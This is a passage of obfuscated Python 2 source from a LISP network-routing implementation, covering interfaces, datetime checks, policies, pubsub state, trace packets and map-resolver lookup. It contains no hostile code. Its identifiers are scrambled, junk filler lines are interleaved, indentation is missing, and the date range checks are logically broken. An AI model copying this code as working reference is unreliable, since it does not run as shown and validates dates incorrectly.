if 36 - 36: iII111i % I1ii11iIi11i + OoOoOO00 - i11iIiiIii % II111iiii % I11i
class lisp_interface ( ) :
def __init__ ( self , device ) :
self . interface_name = ""
self . device = device
self . instance_id = None
self . bridge_socket = None
self . raw_socket = None
self . dynamic_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . dynamic_eid_device = None
self . dynamic_eid_timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
self . multi_tenant_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 92 - 92: O0 * OoooooooOO + I1ii11iIi11i / IiII
if 97 - 97: o0oOOo0O0Ooo . Ii1I + I1Ii111
def add_interface ( self ) :
lisp_myinterfaces [ self . device ] = self
if 72 - 72: i11iIiiIii . iII111i . Ii1I * I1ii11iIi11i
if 49 - 49: OoOoOO00 - O0 % I11i - ooOoO0o * OOooOOo
def get_instance_id ( self ) :
return ( self . instance_id )
if 58 - 58: OoooooooOO - OOooOOo * oO0o / Ii1I . IiII
if 50 - 50: IiII . OOooOOo + I1ii11iIi11i - OoooooooOO
def get_socket ( self ) :
return ( self . raw_socket )
if 2 - 2: o0oOOo0O0Ooo % ooOoO0o / O0 / i11iIiiIii
if 91 - 91: II111iiii * o0oOOo0O0Ooo
def get_bridge_socket ( self ) :
return ( self . bridge_socket )
if 20 - 20: iIii1I11I1II1 % Oo0Ooo * OoOoOO00 % IiII
if 93 - 93: I11i * iIii1I11I1II1 * oO0o
def does_dynamic_eid_match ( self , eid ) :
if ( self . dynamic_eid . is_null ( ) ) : return ( False )
return ( eid . is_more_specific ( self . dynamic_eid ) )
if 74 - 74: I1IiiI
if 39 - 39: iII111i * IiII / iII111i * IiII % I1ii11iIi11i
def set_socket ( self , device ) :
IiII1iiI = socket . socket ( socket . AF_INET , socket . SOCK_RAW , socket . IPPROTO_RAW )
IiII1iiI . setsockopt ( socket . SOL_IP , socket . IP_HDRINCL , 1 )
try :
IiII1iiI . setsockopt ( socket . SOL_SOCKET , socket . SO_BINDTODEVICE , device )
except :
IiII1iiI . close ( )
IiII1iiI = None
if 27 - 27: iIii1I11I1II1 . ooOoO0o
self . raw_socket = IiII1iiI
if 74 - 74: i1IIi % OoOoOO00
if 98 - 98: IiII * OOooOOo / O0 - I1Ii111 . I1Ii111 + OOooOOo
def set_bridge_socket ( self , device ) :
IiII1iiI = socket . socket ( socket . PF_PACKET , socket . SOCK_RAW )
try :
IiII1iiI = IiII1iiI . bind ( ( device , 0 ) )
self . bridge_socket = IiII1iiI
except :
return
if 61 - 61: iII111i * Ii1I % Ii1I + I1IiiI
if 23 - 23: oO0o + I1Ii111 / OoooooooOO / O0 + IiII
if 80 - 80: i11iIiiIii - OoooooooOO + II111iiii / i1IIi - oO0o
if 100 - 100: Ii1I
class lisp_datetime ( ) :
def __init__ ( self , datetime_str ) :
self . datetime_name = datetime_str
self . datetime = None
self . parse_datetime ( )
if 73 - 73: IiII - O0
if 54 - 54: OOooOOo
def valid_datetime ( self ) :
Ii1IIIIi = self . datetime_name
if ( Ii1IIIIi . find ( ":" ) == - 1 ) : return ( False )
if ( Ii1IIIIi . find ( "-" ) == - 1 ) : return ( False )
O0Oo00ooOoOo0 , ii11 , i1iiii111Iii , time = Ii1IIIIi [ 0 : 4 ] , Ii1IIIIi [ 5 : 7 ] , Ii1IIIIi [ 8 : 10 ] , Ii1IIIIi [ 11 : : ]
if 25 - 25: I11i % Ii1I
if ( ( O0Oo00ooOoOo0 + ii11 + i1iiii111Iii ) . isdigit ( ) == False ) : return ( False )
if ( ii11 < "01" and ii11 > "12" ) : return ( False )
if ( i1iiii111Iii < "01" and i1iiii111Iii > "31" ) : return ( False )
if 13 - 13: iIii1I11I1II1 - I1IiiI % o0oOOo0O0Ooo * iIii1I11I1II1
oooo0 , o0oOooo , I111IiiIiiiII = time . split ( ":" )
if 69 - 69: IiII
if ( ( oooo0 + o0oOooo + I111IiiIiiiII ) . isdigit ( ) == False ) : return ( False )
if ( oooo0 < "00" and oooo0 > "23" ) : return ( False )
if ( o0oOooo < "00" and o0oOooo > "59" ) : return ( False )
if ( I111IiiIiiiII < "00" and I111IiiIiiiII > "59" ) : return ( False )
return ( True )
if 47 - 47: O0 - i11iIiiIii + iII111i . I11i
if 84 - 84: I1IiiI
def parse_datetime ( self ) :
oOO = self . datetime_name
oOO = oOO . replace ( "-" , "" )
oOO = oOO . replace ( ":" , "" )
self . datetime = int ( oOO )
if 6 - 6: I1Ii111 . ooOoO0o * I1Ii111 % iIii1I11I1II1 - i11iIiiIii
if 27 - 27: oO0o * i11iIiiIii . o0oOOo0O0Ooo
def now ( self ) :
Oo0OO0000oooo = datetime . datetime . now ( ) . strftime ( "%Y-%m-%d-%H:%M:%S" )
Oo0OO0000oooo = lisp_datetime ( Oo0OO0000oooo )
return ( Oo0OO0000oooo )
if 64 - 64: Ii1I / OOooOOo . i1IIi - Oo0Ooo + oO0o
if 71 - 71: ooOoO0o
def print_datetime ( self ) :
return ( self . datetime_name )
if 32 - 32: OoOoOO00 % IiII % OoO0O00
if 95 - 95: ooOoO0o
def future ( self ) :
return ( self . datetime > self . now ( ) . datetime )
if 47 - 47: I1IiiI * i11iIiiIii / I1IiiI / iIii1I11I1II1 - Ii1I
if 25 - 25: oO0o / i11iIiiIii + i11iIiiIii % IiII - o0oOOo0O0Ooo
def past ( self ) :
return ( self . future ( ) == False )
if 97 - 97: I1ii11iIi11i % iII111i * ooOoO0o % OOooOOo . I1IiiI - i11iIiiIii
if 2 - 2: IiII . o0oOOo0O0Ooo % II111iiii
def now_in_range ( self , upper ) :
return ( self . past ( ) and upper . future ( ) )
if 69 - 69: Ii1I
if 75 - 75: I1IiiI
def this_year ( self ) :
OoooOOoOo = str ( self . now ( ) . datetime ) [ 0 : 4 ]
Oo0OO0000oooo = str ( self . datetime ) [ 0 : 4 ]
return ( Oo0OO0000oooo == OoooOOoOo )
if 91 - 91: I11i + Ii1I / iII111i % iIii1I11I1II1 . o0oOOo0O0Ooo + I1IiiI
if 25 - 25: i1IIi * o0oOOo0O0Ooo
def this_month ( self ) :
OoooOOoOo = str ( self . now ( ) . datetime ) [ 0 : 6 ]
Oo0OO0000oooo = str ( self . datetime ) [ 0 : 6 ]
return ( Oo0OO0000oooo == OoooOOoOo )
if 82 - 82: oO0o
if 42 - 42: OoooooooOO - ooOoO0o . OoooooooOO
def today ( self ) :
OoooOOoOo = str ( self . now ( ) . datetime ) [ 0 : 8 ]
Oo0OO0000oooo = str ( self . datetime ) [ 0 : 8 ]
return ( Oo0OO0000oooo == OoooOOoOo )
if 77 - 77: I1IiiI
if 16 - 16: I1IiiI + ooOoO0o - O0 / o0oOOo0O0Ooo
if 36 - 36: Oo0Ooo - OoOoOO00 - II111iiii
if 25 - 25: i11iIiiIii + II111iiii * OOooOOo % OOooOOo
if 87 - 87: I11i % Ii1I % Oo0Ooo . II111iiii / oO0o
if 19 - 19: O0 . OOooOOo + I1Ii111 * I1ii11iIi11i
class lisp_policy_match ( ) :
def __init__ ( self ) :
self . source_eid = None
self . dest_eid = None
self . source_rloc = None
self . dest_rloc = None
self . rloc_record_name = None
self . geo_name = None
self . elp_name = None
self . rle_name = None
self . json_name = None
self . datetime_lower = None
self . datetime_upper = None
if 91 - 91: o0oOOo0O0Ooo / oO0o . o0oOOo0O0Ooo + IiII + ooOoO0o . I1Ii111
if 90 - 90: i1IIi + oO0o * oO0o / ooOoO0o . IiII
class lisp_policy ( ) :
def __init__ ( self , policy_name ) :
self . policy_name = policy_name
self . match_clauses = [ ]
self . set_action = None
self . set_record_ttl = None
self . set_source_eid = None
self . set_dest_eid = None
self . set_rloc_address = None
self . set_rloc_record_name = None
self . set_geo_name = None
self . set_elp_name = None
self . set_rle_name = None
self . set_json_name = None
if 98 - 98: I11i % OoO0O00 . iII111i - o0oOOo0O0Ooo
if 92 - 92: I11i
def match_policy_map_request ( self , mr , srloc ) :
for IIiiiIiii in self . match_clauses :
III1I1Iii1 = IIiiiIiii . source_eid
Ii1i11iIi1iII = mr . source_eid
if ( III1I1Iii1 and Ii1i11iIi1iII and Ii1i11iIi1iII . is_more_specific ( III1I1Iii1 ) == False ) : continue
if 34 - 34: I1IiiI % iIii1I11I1II1 . I1ii11iIi11i * Oo0Ooo * iIii1I11I1II1 / O0
III1I1Iii1 = IIiiiIiii . dest_eid
Ii1i11iIi1iII = mr . target_eid
if ( III1I1Iii1 and Ii1i11iIi1iII and Ii1i11iIi1iII . is_more_specific ( III1I1Iii1 ) == False ) : continue
if 98 - 98: iII111i % IiII + OoO0O00
III1I1Iii1 = IIiiiIiii . source_rloc
Ii1i11iIi1iII = srloc
if ( III1I1Iii1 and Ii1i11iIi1iII and Ii1i11iIi1iII . is_more_specific ( III1I1Iii1 ) == False ) : continue
I1111III111ii = IIiiiIiii . datetime_lower
i11iI1iIiI = IIiiiIiii . datetime_upper
if ( I1111III111ii and i11iI1iIiI and I1111III111ii . now_in_range ( i11iI1iIiI ) == False ) : continue
return ( True )
if 90 - 90: I1IiiI * II111iiii + O0
return ( False )
if 94 - 94: ooOoO0o * ooOoO0o + o0oOOo0O0Ooo . iII111i % iIii1I11I1II1 + Ii1I
if 88 - 88: Oo0Ooo . iII111i
def set_policy_map_reply ( self ) :
O000Oo = ( self . set_rloc_address == None and
self . set_rloc_record_name == None and self . set_geo_name == None and
self . set_elp_name == None and self . set_rle_name == None )
if ( O000Oo ) : return ( None )
if 22 - 22: Oo0Ooo + O0 + OoO0O00
oOo00O = lisp_rloc ( )
if ( self . set_rloc_address ) :
oOo00O . rloc . copy_address ( self . set_rloc_address )
IiiIIi1 = oOo00O . rloc . print_address_no_iid ( )
lprint ( "Policy set-rloc-address to {}" . format ( IiiIIi1 ) )
if 83 - 83: i1IIi + OoooooooOO * IiII
if ( self . set_rloc_record_name ) :
oOo00O . rloc_name = self . set_rloc_record_name
oO00 = blue ( oOo00O . rloc_name , False )
lprint ( "Policy set-rloc-record-name to {}" . format ( oO00 ) )
if 65 - 65: II111iiii / I1Ii111 + I1IiiI - OoooooooOO + ooOoO0o - I1ii11iIi11i
if ( self . set_geo_name ) :
oOo00O . geo_name = self . set_geo_name
oO00 = oOo00O . geo_name
iIi1I = "" if lisp_geo_list . has_key ( oO00 ) else "(not configured)"
if 95 - 95: ooOoO0o
lprint ( "Policy set-geo-name '{}' {}" . format ( oO00 , iIi1I ) )
if 95 - 95: Ii1I + i1IIi . I1IiiI % I1Ii111 / Ii1I * O0
if ( self . set_elp_name ) :
oOo00O . elp_name = self . set_elp_name
oO00 = oOo00O . elp_name
iIi1I = "" if lisp_elp_list . has_key ( oO00 ) else "(not configured)"
if 68 - 68: I1Ii111 - IiII - oO0o - Oo0Ooo - o0oOOo0O0Ooo
lprint ( "Policy set-elp-name '{}' {}" . format ( oO00 , iIi1I ) )
if 32 - 32: OoOoOO00 % i11iIiiIii
if ( self . set_rle_name ) :
oOo00O . rle_name = self . set_rle_name
oO00 = oOo00O . rle_name
iIi1I = "" if lisp_rle_list . has_key ( oO00 ) else "(not configured)"
if 53 - 53: I1Ii111 * Ii1I / IiII . i1IIi * II111iiii / o0oOOo0O0Ooo
lprint ( "Policy set-rle-name '{}' {}" . format ( oO00 , iIi1I ) )
if 44 - 44: I1Ii111 + ooOoO0o
if ( self . set_json_name ) :
oOo00O . json_name = self . set_json_name
oO00 = oOo00O . json_name
iIi1I = "" if lisp_json_list . has_key ( oO00 ) else "(not configured)"
if 15 - 15: I11i + OoO0O00 + OoOoOO00
lprint ( "Policy set-json-name '{}' {}" . format ( oO00 , iIi1I ) )
if 100 - 100: I1Ii111
return ( oOo00O )
if 78 - 78: OoOoOO00
if 16 - 16: I1Ii111 % OoO0O00 - OoO0O00 % OoOoOO00 * OoO0O00
def save_policy ( self ) :
lisp_policies [ self . policy_name ] = self
if 36 - 36: OoOoOO00 * II111iiii . OoooooooOO * I11i . I11i
if 13 - 13: I1ii11iIi11i * II111iiii
if 93 - 93: OOooOOo / O0 - o0oOOo0O0Ooo + OoO0O00 * I1IiiI
class lisp_pubsub ( ) :
def __init__ ( self , itr , port , nonce , ttl , xtr_id ) :
self . itr = itr
self . port = port
self . nonce = nonce
self . uptime = lisp_get_timestamp ( )
self . ttl = ttl
self . xtr_id = xtr_id
self . map_notify_count = 0
if 53 - 53: I1ii11iIi11i
if 91 - 91: o0oOOo0O0Ooo - I1ii11iIi11i . i1IIi
def add ( self , eid_prefix ) :
oo0o = self . ttl
OOo0O0O0o0 = eid_prefix . print_prefix ( )
if ( lisp_pubsub_cache . has_key ( OOo0O0O0o0 ) == False ) :
lisp_pubsub_cache [ OOo0O0O0o0 ] = { }
if 64 - 64: ooOoO0o
o0oo0O = lisp_pubsub_cache [ OOo0O0O0o0 ]
if 23 - 23: Oo0Ooo . OoO0O00
iI1i1iIIIII = "Add"
if ( o0oo0O . has_key ( self . xtr_id ) ) :
iI1i1iIIIII = "Replace"
del ( o0oo0O [ self . xtr_id ] )
if 19 - 19: oO0o - I1ii11iIi11i + iII111i . o0oOOo0O0Ooo . OoO0O00 * Oo0Ooo
o0oo0O [ self . xtr_id ] = self
if 39 - 39: i11iIiiIii - iII111i / O0 % Oo0Ooo
OOo0O0O0o0 = green ( OOo0O0O0o0 , False )
III1iii1 = red ( self . itr . print_address_no_iid ( ) , False )
oooOOOO0oOo = "0x" + lisp_hex_string ( self . xtr_id )
lprint ( "{} pubsub state {} for {}, xtr-id: {}, ttl {}" . format ( iI1i1iIIIII , OOo0O0O0o0 ,
III1iii1 , oooOOOO0oOo , oo0o ) )
if 40 - 40: O0 * Oo0Ooo % o0oOOo0O0Ooo / OoooooooOO
if 94 - 94: iII111i
def delete ( self , eid_prefix ) :
OOo0O0O0o0 = eid_prefix . print_prefix ( )
III1iii1 = red ( self . itr . print_address_no_iid ( ) , False )
oooOOOO0oOo = "0x" + lisp_hex_string ( self . xtr_id )
if ( lisp_pubsub_cache . has_key ( OOo0O0O0o0 ) ) :
o0oo0O = lisp_pubsub_cache [ OOo0O0O0o0 ]
if ( o0oo0O . has_key ( self . xtr_id ) ) :
o0oo0O . pop ( self . xtr_id )
lprint ( "Remove pubsub state {} for {}, xtr-id: {}" . format ( OOo0O0O0o0 ,
III1iii1 , oooOOOO0oOo ) )
if 79 - 79: o0oOOo0O0Ooo / I1ii11iIi11i . iII111i . II111iiii + I1ii11iIi11i * I11i
if 49 - 49: Ii1I * OoooooooOO * i1IIi % OoOoOO00
if 83 - 83: iIii1I11I1II1 - i1IIi - Ii1I % iII111i
if 69 - 69: I1Ii111 * oO0o * I1IiiI
if 74 - 74: O0 / I11i . Oo0Ooo / I11i % OoO0O00 % o0oOOo0O0Ooo
if 83 - 83: OoO0O00 - i11iIiiIii + iIii1I11I1II1
if 52 - 52: OoooooooOO
if 44 - 44: O0 / OoooooooOO + ooOoO0o * I1ii11iIi11i
if 36 - 36: I1ii11iIi11i / OoO0O00 - oO0o % O0
if 12 - 12: i1IIi * ooOoO0o / oO0o + I1IiiI / OoooooooOO
if 86 - 86: Oo0Ooo / OoO0O00
if 78 - 78: I1IiiI * I1IiiI
if 13 - 13: oO0o
if 43 - 43: oO0o / Ii1I % OOooOOo
if 45 - 45: II111iiii
if 41 - 41: Ii1I / OOooOOo * Oo0Ooo . O0 - i11iIiiIii
if 77 - 77: o0oOOo0O0Ooo + I1IiiI + I1Ii111 / I1ii11iIi11i * i1IIi
if 37 - 37: O0 + iIii1I11I1II1 % IiII * oO0o
if 43 - 43: OOooOOo . O0
if 76 - 76: OOooOOo * OoooooooOO / IiII . OoO0O00 + II111iiii
if 23 - 23: OoO0O00 - OoooooooOO * I11i . iIii1I11I1II1 / o0oOOo0O0Ooo + oO0o
if 74 - 74: II111iiii / I1IiiI * O0 * OoO0O00 . I11i
class lisp_trace ( ) :
def __init__ ( self ) :
self . nonce = lisp_get_control_nonce ( )
self . packet_json = [ ]
self . local_rloc = None
self . local_port = None
self . lisp_socket = None
if 74 - 74: O0 . i1IIi / I1ii11iIi11i + o0oOOo0O0Ooo
if 24 - 24: ooOoO0o % I1Ii111 + OoO0O00 * o0oOOo0O0Ooo % O0 - i11iIiiIii
def print_trace ( self ) :
iIIIOOOO0 = self . packet_json
lprint ( "LISP-Trace JSON: '{}'" . format ( iIIIOOOO0 ) )
if 38 - 38: IiII / Ii1I % II111iiii
if 56 - 56: ooOoO0o - OoooooooOO - i11iIiiIii
def encode ( self ) :
ooo0OOoo = socket . htonl ( 0x90000000 )
IIii1i = struct . pack ( "II" , ooo0OOoo , 0 )
IIii1i += struct . pack ( "Q" , self . nonce )
IIii1i += json . dumps ( self . packet_json )
return ( IIii1i )
if 27 - 27: Ii1I . OoOoOO00 % oO0o % o0oOOo0O0Ooo / i11iIiiIii - iIii1I11I1II1
if 77 - 77: o0oOOo0O0Ooo . OoOoOO00 % Ii1I
def decode ( self , packet ) :
O00oO00oOO00O = "I"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( False )
ooo0OOoo = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] ) [ 0 ]
packet = packet [ ooOoooOoo0oO : : ]
ooo0OOoo = socket . ntohl ( ooo0OOoo )
if ( ( ooo0OOoo & 0xff000000 ) != 0x90000000 ) : return ( False )
if 94 - 94: I11i / IiII - OoOoOO00 % OoO0O00 % i11iIiiIii . Ii1I
if ( len ( packet ) < ooOoooOoo0oO ) : return ( False )
IiiIIi1 = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] ) [ 0 ]
packet = packet [ ooOoooOoo0oO : : ]
if 26 - 26: i1IIi - Ii1I * I1IiiI
IiiIIi1 = socket . ntohl ( IiiIIi1 )
OO0O0o0Oo0o0 = IiiIIi1 >> 24
ii1IIi11II1i = ( IiiIIi1 >> 16 ) & 0xff
OOooO = ( IiiIIi1 >> 8 ) & 0xff
Ii1II111i1 = IiiIIi1 & 0xff
self . local_rloc = "{}.{}.{}.{}" . format ( OO0O0o0Oo0o0 , ii1IIi11II1i , OOooO , Ii1II111i1 )
self . local_port = str ( ooo0OOoo & 0xffff )
if 95 - 95: i11iIiiIii / I1IiiI + OOooOOo / I1ii11iIi11i
O00oO00oOO00O = "Q"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( False )
self . nonce = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] ) [ 0 ]
packet = packet [ ooOoooOoo0oO : : ]
if ( len ( packet ) == 0 ) : return ( True )
if 10 - 10: IiII + o0oOOo0O0Ooo + I11i % O0 % I1Ii111
try :
self . packet_json = json . loads ( packet )
except :
return ( False )
if 85 - 85: O0 % OoOoOO00 . I1ii11iIi11i
return ( True )
if 46 - 46: OOooOOo * iIii1I11I1II1
if 33 - 33: OoO0O00 * II111iiii / i1IIi
def myeid ( self , eid ) :
return ( lisp_is_myeid ( eid ) )
if 93 - 93: I1Ii111 % I11i
if 64 - 64: I1IiiI % OoOoOO00 / Oo0Ooo
def return_to_sender ( self , lisp_socket , rts_rloc , packet ) :
oOo00O , IiI1iI1 = self . rtr_cache_nat_trace_find ( rts_rloc )
if ( oOo00O == None ) :
oOo00O , IiI1iI1 = rts_rloc . split ( ":" )
IiI1iI1 = int ( IiI1iI1 )
lprint ( "Send LISP-Trace to address {}:{}" . format ( oOo00O , IiI1iI1 ) )
else :
lprint ( "Send LISP-Trace to translated address {}:{}" . format ( oOo00O ,
IiI1iI1 ) )
if 40 - 40: Ii1I + iIii1I11I1II1 / oO0o . II111iiii % O0 - IiII
if 49 - 49: IiII - OOooOOo * OOooOOo . O0
if ( lisp_socket == None ) :
IiII1iiI = socket . socket ( socket . AF_INET , socket . SOCK_DGRAM )
IiII1iiI . bind ( ( "0.0.0.0" , LISP_TRACE_PORT ) )
IiII1iiI . sendto ( packet , ( oOo00O , IiI1iI1 ) )
IiII1iiI . close ( )
else :
lisp_socket . sendto ( packet , ( oOo00O , IiI1iI1 ) )
if 60 - 60: OoOoOO00 % iIii1I11I1II1 + IiII % o0oOOo0O0Ooo
if 64 - 64: OoOoOO00 * I1ii11iIi11i . OoooooooOO . i1IIi
if 61 - 61: OoO0O00
def packet_length ( self ) :
o0oOo00 = 8 ; o0oo0Oo = 4 + 4 + 8
return ( o0oOo00 + o0oo0Oo + len ( json . dumps ( self . packet_json ) ) )
if 55 - 55: OoO0O00 . Oo0Ooo + iII111i % OoO0O00 * O0
if 37 - 37: OOooOOo
def rtr_cache_nat_trace ( self , translated_rloc , translated_port ) :
ii1i1I1111ii = self . local_rloc + ":" + self . local_port
i11II = ( translated_rloc , translated_port )
lisp_rtr_nat_trace_cache [ ii1i1I1111ii ] = i11II
lprint ( "Cache NAT Trace addresses {} -> {}" . format ( ii1i1I1111ii , i11II ) )
if 100 - 100: Oo0Ooo * I1IiiI . ooOoO0o
if 53 - 53: OOooOOo + o0oOOo0O0Ooo * Ii1I + O0
def rtr_cache_nat_trace_find ( self , local_rloc_and_port ) :
ii1i1I1111ii = local_rloc_and_port
try : i11II = lisp_rtr_nat_trace_cache [ ii1i1I1111ii ]
except : i11II = ( None , None )
return ( i11II )
if 75 - 75: OoooooooOO
if 24 - 24: I1Ii111 % i11iIiiIii % oO0o . OOooOOo % IiII
if 23 - 23: o0oOOo0O0Ooo * II111iiii - Oo0Ooo - I1IiiI
if 86 - 86: I1IiiI - II111iiii * II111iiii * oO0o % OoooooooOO * OoOoOO00
if 93 - 93: I1IiiI + OoO0O00 % O0 - ooOoO0o * i1IIi
if 60 - 60: I1IiiI
if 9 - 9: I11i % i1IIi / ooOoO0o % iII111i - oO0o - II111iiii
if 29 - 29: ooOoO0o . II111iiii . i1IIi % oO0o
if 11 - 11: OoOoOO00 . OoO0O00 % I11i * iII111i % I1Ii111 . O0
if 17 - 17: OOooOOo / i11iIiiIii - i11iIiiIii . II111iiii . ooOoO0o
if 38 - 38: OOooOOo . OoooooooOO . II111iiii + OoO0O00 / oO0o . OoooooooOO
def lisp_get_map_server ( address ) :
for o00oO0Oo in lisp_map_servers_list . values ( ) :
if ( o00oO0Oo . map_server . is_exact_match ( address ) ) : return ( o00oO0Oo )
if 100 - 100: OoO0O00
return ( None )
if 36 - 36: oO0o + Ii1I - O0
if 19 - 19: O0 + I1Ii111 . I1Ii111 * IiII * ooOoO0o + i1IIi
if 51 - 51: ooOoO0o % OoOoOO00 % i1IIi / O0
if 11 - 11: OOooOOo . I1ii11iIi11i * OOooOOo * OoO0O00
if 11 - 11: I11i
if 85 - 85: OoOoOO00 - Ii1I / Oo0Ooo % I1ii11iIi11i
if 12 - 12: i1IIi + o0oOOo0O0Ooo / oO0o . O0
def lisp_get_any_map_server ( ) :
for o00oO0Oo in lisp_map_servers_list . values ( ) : return ( o00oO0Oo )
return ( None )
if 37 - 37: IiII
if 99 - 99: i11iIiiIii % i11iIiiIii . I11i * I1ii11iIi11i . OoO0O00 / I1IiiI
if 44 - 44: iII111i - OoO0O00 / i11iIiiIii
if 55 - 55: O0 * OoO0O00 * i1IIi
if 9 - 9: IiII
if 64 - 64: ooOoO0o + OoooooooOO
if 99 - 99: iIii1I11I1II1 * II111iiii * i11iIiiIii
if 10 - 10: OOooOOo
if 75 - 75: I11i * ooOoO0o * Oo0Ooo . i1IIi . ooOoO0o . ooOoO0o
if 24 - 24: iIii1I11I1II1
def lisp_get_map_resolver ( address , eid ) :
if ( address != None ) :
IiiIIi1 = address . print_address ( )
O0o00000o0O = None
for ii1i1I1111ii in lisp_map_resolvers_list :
if ( ii1i1I1111ii . find ( IiiIIi1 ) == - 1 ) : continue
O0o00000o0O = lisp_map_resolvers_list [ ii1i1I1111ii ]
if 72 - 72: i11iIiiIii + o0oOOo0O0Ooo % ooOoO0o * I1ii11iIi11i . i1IIi
return ( O0o00000o0O )
if 59 - 59: OoooooooOO - OoooooooOO - o0oOOo0O0Ooo + i1IIi % I1Ii111
if 74 - 74: IiII * iIii1I11I1II1 - I1IiiI
if 62 - 62: o0oOOo0O0Ooo
if 54 - 54: iIii1I11I1II1 / OoooooooOO + o0oOOo0O0Ooo . i1IIi - OoooooooOO
if 70 - 70: Ii1I / OoOoOO00 * Oo0Ooo
if 32 - 32: I1Ii111 . OoOoOO00 % OoooooooOO + I1Ii111 * OoO0O00
if 84 - 84: OoOoOO00
if ( eid == "" ) :
oO0oo00OO = ""
elif ( eid == None ) :
oO0oo00OO = "all"
else :
Ooooo00 = lisp_db_for_lookups . lookup_cache ( eid , False )
oO0oo00OO = "all" if Ooooo00 == None else Ooooo00 . use_mr_name
if 52 - 52: I11i % I1Ii111 % i11iIiiIii
if 84 - 84: I1IiiI % II111iiii + Oo0Ooo + OoOoOO00 + Oo0Ooo . I1Ii111
ooo00o0 = None
for O0o00000o0O in lisp_map_resolvers_list . values ( ) :
if ( oO0oo00OO == "" ) : return ( O0o00000o0O )
if ( O0o00000o0O . mr_name != oO0oo00OO ) : continue
if ( ooo00o0 == None or O0o00000o0O . last_used < ooo00o0 . last_used ) : ooo00o0 = O0o00000o0O
if 38 - 38: II111iiii * IiII * OoooooooOO + IiII
return ( ooo00o0 )
if 7 - 7: iIii1I11I1II1
if 35 - 35: IiII + O0 % I1Ii111 - I1ii11iIi11i - i1IIi
if 100 - 100: I1Ii111 + i11iIiiIii - IiII / I1ii11iIi11i / iII111i
if 56 - 56: iII111i
if 91 - 91: Oo0Ooo . I11i . I1ii11iIi11i
if 60 - 60: i11iIiiIii - OOooOOo
if 78 - 78: I1IiiI * ooOoO0o % iIii1I11I1II1 / I1ii11iIi11i
if 61 - 61: I1Ii111 . Ii1I + OoooooooOO
def lisp_get_decent_map_resolver ( eid ) :
ooo = lisp_get_decent_index ( eid )
OOIIi1Iii1I = str ( ooo ) + "." + lisp_decent_dns_suffix
if 100 - 100: I1ii11iIi11i - I1IiiI
lprint ( "Use LISP-Decent map-resolver {} for EID {}" . format ( bold ( OOIIi1Iii1I , False ) , eid . print_prefix ( ) ) )
if 58 - 58: Ii1I / Oo0Ooo % IiII
if 33 - 33: II111iiii . OOooOOo % iIii1I11I1II1 - Oo0Ooo - OoOoOO00 % i11iIiiIii
ooo00o0 = None
for O0o00000o0O in lisp_map_resolvers_list . values ( ) :
if ( OOIIi1Iii1I != O0o00000o0O . dns_name ) : continue
if ( ooo00o0 == None or O0o00000o0O . last_used < ooo00o0 . last_used ) : ooo00o0 = O0o00000o0O
if 60 - 60: iII111i . o0oOOo0O0Ooo
return ( ooo00o0 )
if 56 - 56: I1ii11iIi11i
if 89 - 89: Oo0Ooo + I1ii11iIi11i * o0oOOo0O0Ooo * oO0o % O0 % OoO0O00
if 70 - 70: o0oOOo0O0Ooo + O0 % I1IiiI
if 56 - 56: Ii1I
if 84 - 84: iII111i
if 21 - 21: i11iIiiIii
if 30 - 30: OoO0O00 + OoooooooOO
def lisp_ipv4_input ( packet ) :
if 98 - 98: I1ii11iIi11i % I1IiiI
if 9 - 9: o0oOOo0O0Ooo / I1Ii111 % i1IIi - OOooOOo % I1IiiI / I1ii11iIi11i
if 66 - 66: IiII
if 56 - 56: oO0o + OoooooooOO
if ( ord ( packet [ 9 ] ) == 2 ) : return ( [ True , packet ] )
if 75 - 75: O0 % Ii1I
if 47 - 47: OoooooooOO - OoooooooOO + OoO0O00 / iIii1I11I1II1
if 23 - 23: iII111i / iIii1I11I1II1
if 5 - 5: O0
Oo0 = struct . unpack ( "H" , packet [ 10 : 12 ] ) [ 0 ]
if ( Oo0 == 0 ) :
dprint ( "Packet arrived with checksum of 0!" )
else :
packet = lisp_ip_checksum ( packet )
Oo0 = struct . unpack ( "H" , packet [ 10 : 12 ] ) [ 0 ]
if ( Oo0 != 0 ) :
dprint ( "IPv4 header checksum failed for inner header" )
packet = lisp_format_packet ( packet [ 0 : 20 ] )
dprint ( "Packet header: {}" . format ( packet ) )
return ( [ False , None ] )
if 64 - 64: i1IIi * i1IIi . iII111i - O0 - oO0o % OoooooooOO
if 14 - 14: Ii1I % OoO0O00 % I1Ii111 * O0
if 8 - 8: I1IiiI - i11iIiiIii * I1IiiI
if 6 - 6: O0 - OoOoOO00 - i11iIiiIii / iII111i
if 63 - 63: OOooOOo
if 84 - 84: i11iIiiIii * iIii1I11I1II1 % I11i % iII111i + OoooooooOO . o0oOOo0O0Ooo
if 78 - 78: o0oOOo0O0Ooo . iII111i + O0 / I1ii11iIi11i + I1ii11iIi11i + II111iiii
oo0o = struct . unpack ( "B" , packet [ 8 : 9 ] ) [ 0 ]
if ( oo0o == 0 ) :
dprint ( "IPv4 packet arrived with ttl 0, packet discarded" )
return ( [ False , None ] )
elif ( oo0o == 1 ) :
dprint ( "IPv4 packet {}, packet discarded" . format ( bold ( "ttl expiry" , False ) ) )
if 96 - 96: iIii1I11I1II1 * II111iiii . iIii1I11I1II1
return ( [ False , None ] )
if 13 - 13: Ii1I - OoOoOO00 . Ii1I
if 7 - 7: Ii1I - I11i / I1ii11iIi11i + iII111i
oo0o -= 1
packet = packet [ 0 : 8 ] + struct . pack ( "B" , oo0o ) + packet [ 9 : : ]
packet = packet [ 0 : 10 ] + struct . pack ( "H" , 0 ) + packet [ 12 : : ]
packet = lisp_ip_checksum ( packet )
return ( [ False , packet ] )
if 47 - 47: I11i * IiII / oO0o - OoooooooOO . OoooooooOO / I11i
if 73 - 73: Ii1I . IiII % IiII
if 56 - 56: I1Ii111 + iII111i + iII111i
if 99 - 99: o0oOOo0O0Ooo % I1ii11iIi11i / Oo0Ooo . O0 + OoO0O00 * OoOoOO00
if 48 - 48: iIii1I11I1II1 + O0 * I11i * i11iIiiIii . Ii1I / i1IIi
